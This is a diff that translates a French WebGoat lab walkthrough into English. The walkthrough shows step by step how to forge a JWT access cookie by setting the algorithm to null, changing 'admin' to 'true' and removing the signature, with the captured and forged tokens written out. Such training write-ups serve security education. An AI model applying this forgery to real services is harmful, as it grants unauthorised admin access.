PiAil/pwning-webgoat/wiki_owasp_webgoat.en.md

 ![Hint](images/wiki_owasp_webgoat/hint.png) Change the admin field to true in the token
 ![Hint](images/wiki_owasp_webgoat/hint.png) Submit the token by changing the algorithm to None and remove the signature

-*   Ouvrir les _Outils de développements_ du navigateur, et aller dans l'onglet _Réseau_.
-Open the _Development Tools_ in the browser, and go to the _Network_ tab.
+*   Open the _Development Tools_ in the browser, and go to the _Network_ tab.
-*   Sur WebGoat, se connecter avec Tom et cliquer sur **Reset Votes**.
-Log in as Tom on WebGoat and click on **Reset Votes**.
+*   Log in as Tom on WebGoat and click on **Reset Votes**.
-*   Repérer la requête vers `reset` dans l'onglet _Réseau_ et cliquer sur _En-têtes_.
-Locate the query to `reset` in the _Network_ tab and click on _Headers_.
+*   Locate the query to `reset` in the _Network_ tab and click on _Headers_.
-*   Remarquer l'en-tête : `Cookie: access_token=eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1NjQ0MDIyNDQsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0._gPSRvB9wAAruFwaDgivXp4n5rHQFi5hTOJsVFqCkR9ZDUf3LhCgJQuTIIpTGnZIS3XWL9MHZGaExJC7XhIiXA` Notice the header: `Cookie: access_token=eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1NjQ0MDIyNDQsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0._gPSRvB9wAAruFwaDgivXp4n5rHQFi5hTOJsVFqCkR9ZDUf3LhCgJQuTIIpTGnZIS3XWL9MHZGaExJC7XhIiXA`
+*   Notice the header: `Cookie: access_token=eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1NjQ0MDIyNDQsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0._gPSRvB9wAAruFwaDgivXp4n5rHQFi5hTOJsVFqCkR9ZDUf3LhCgJQuTIIpTGnZIS3XWL9MHZGaExJC7XhIiXA`
-*   En base64, cela se décode en : `{"alg":"HS512"}.{"iat":1564402244,"admin":"false","user":"Tom"}.signature`.
-In base64, this is decoded as: `{"alg":"HS512"}.{"Iat":1564402244,"admin":"false","user":"Tom"}.signature`.
+*   In base64, this is decoded as: `{"alg":"HS512"}.{"Iat":1564402244,"admin":"false","user":"Tom"}.signature`.
-*   Le modifier en `{"alg":null}.{"iat":1564402244,"admin":"true","user":"Tom"}.`.
-Edit it to `{"alg": null}.{"Iat":1564402244,"admin":"true","user":"Tom"}.`.
+*   Edit it to `{"alg": null}.{"Iat":1564402244,"admin":"true","user":"Tom"}.`.
-*   Le ré-encoder en base64 (`eyJhbGciOiBudWxsfQ==.eyJpYXQiOjE1NjQ0MDIyNDQsImFkbWluIjoidHJ1ZSIsInVzZXIiOiJUb20ifQ==.`).
-Re-encode it to base64 (`eyJhbGciOiBudWxsfQ==.eyJpYXQiOjE1NjQ0MDIyNDQsImFkbWluIjoidHJ1ZSIsInVzZXIiOiJUb20ifQ==.`).
+*   Re-encode it to base64 (`eyJhbGciOiBudWxsfQ==.eyJpYXQiOjE1NjQ0MDIyNDQsImFkbWluIjoidHJ1ZSIsInVzZXIiOiJUb20ifQ==.`).
-*   Cliquer sur _Modifier et Renvoyer_, modifier le cookie avec la nouvelle valeur générée, et renvoyer la requête.
-Click on _Modify and Resend_, modify the cookie with the newly generated value and send again the request.
+*   Click on _Modify and Resend_, modify the cookie with the newly generated value and send again the request.

 ![JWT 4](images/wiki_owasp_webgoat/jwt-4.png)